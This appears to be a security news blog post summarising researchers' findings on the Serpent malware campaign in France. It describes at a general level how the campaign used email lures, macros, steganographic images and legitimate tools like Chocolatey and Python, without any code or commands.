New Serpent Malware Uses Unusual Infiltration Tactics

Security researchers discovered a recent campaign to spread a novel strain of malware that was named Serpent. The tools and methods used to infiltrate its victims are what sets Serpent apart from more pedestrian malware.

A research team with security company Proofpoint tracks the malware campaign spreading Serpent to targets in France. The team describes Serpent as "advanced" malware that uses unusual tactics.

Serpent starts boring, evolves into the unusual

The Serpent malware is being spread using email lures and garden-variety malicious files to deliver its payload. This is not where things get interesting. However, between the point of initial penetration and delivering the final payload, Serpent does a lot of snaking around to avoid detection and uses tactics that researchers say they haven't encountered before.

Serpent starts off its infection chain in a very mundane way - emails containing lures and malicious attachments with VB macros in them. The social engineering lure used in titles and body text of the malicious emails uses the General Data Protection Regulations of the European Union.

Once the macro executes, it hits a URL that appears to be an image but uses steganography to hide a PowerShell script among its data. The script is further encoded using base64.

The first thing the script does is download and install Chocolatey - a software automation tool running on Windows used to produce wrappers for executable files. There is no malicious payload at this point - the Chocolatey download is a legitimate tool that will almost certainly bypass automated security.

Chocolatey is employed to install Python and a specific component named pip and used for package management. The next step is to install different dependencies on the targeted system, including one that allows for data transfer over proxy servers.

The same PowerShell script hits another image URL, once again using steganography to hide a Python script, again encoded in base64. The script is named to mimic a Microsoft security component, bearing the name "MicrosoftSecurityUpdate.py". The Python script is in turn executed through a batch file created by the original PowerShell script.

The malware's further behavior is more conventional as well, but the unusual tactics and the installation of several legitimate tools to facilitate the delivery of the final payload make Serpent noteworthy. The final payload is also a unique new piece of malware.

By Zaib
March 23, 2022
Computer Security
English
March 23, 2022
Computer Security

Popular Posts

As Fears of the Coronavirus Pandemic Spread, So Does...

5 years ago

What is the OperaGXSetup.exe File and is it Malicious?

11 months ago

Eporner.com And Why Its Excessive Pop-Ups Are Risky

11 days ago

HackTool:Win32/Crack: a Malicious Threat That Can Seriously...

7 months ago

Take Note: Someone Added You As Their Recovery Email Scam

10 months ago

A Potentially Serious Threat: Trojan:Win32/Suschil!rfn

18 days ago

Related Posts

Trojan

BlackTech APT Uses the Gh0stTimes Malware

The Gh0stTimes Malware is an upgraded variant of a well-known Remote Access Trojan – the Gh0st RAT. Both of these threats have been involved in multiple attack campaigns of the BlackTech hacking group. Unfortunately,... Read more

October 13, 2021
Android Malware

TangleBot Android Malware Uses COVID-themed Phishing

Android users in the United States and Canada have become the target of a new malware campaign. The criminals behind it use a threat called TangleBot. This is a new piece of Android malware, which packs a long list of... Read more

September 24, 2021
Computer Security

Malware Increasingly Uses TLS to Obfuscate Communication

Security experts working with Sophos recently published a report on the shifting trends in malware and ransomware. The publication shows that there has been a very significant surge in malware that uses TLS, or... Read more

April 22, 2021
English
Loading...

Cyclonis Password Manager Details & Terms

FREE Trial: 30-Day One-Time Offer! No credit card required for Free Trial. Full functionality for the length of the Free Trial. (Full functionality after Free Trial requires subscription purchase.) To learn more about our policies and pricing, see EULA, Privacy Policy, Discount Terms and Purchase Page. If you wish to uninstall the app, please visit the Uninstallation Instructions page.

Home

Products

Cyclonis Password Manager Cyclonis World Time

Support

Help Files FAQs Downloads Inquiries & Support

Company

About Us Contact Us Report Abuse

Legal (Post Merger)

EnigmaSoft Limited (fka Cyclonis Limited)

Cyclonis Password Manager's EULA Cyclonis World Time's Terms of Service Privacy Policy Cookie Policy Special Discount Offer Terms Additional Terms & Conditions SpyHunter EULA RegHunter EULA EnigmaSoft Privacy Policy & Cookie Policy ESG Privacy Policy & Cookie Policy EnigmaSoft Discount Offer Terms ESG Discount Offer Terms

© 2017-2025 Cyclonis Ltd. CYCLONIS is a trademark of EnigmaSoft Limited (Cyclonis was merged into EnigmaSoft Limited effective November 25, 2023.) All rights reserved.

Registered Office EnigmaSoft Limited: 1 Castle Street, 3rd Floor, Dublin 2 D02 XD82, Ireland.
EnigmaSoft Limited, Private Company Limited by shares, Company Registration Number 597114.

Windows is a trademark of Microsoft, registered in the U.S. and other countries.
Mac, iPhone, iPad and App Store are trademarks of Apple Inc., registered in the U.S. and other countries.
iOS is a registered trademark of Cisco Systems, Inc. and/or its affiliates in the United States and certain other countries.
Android and Google Play are trademarks of Google LLC.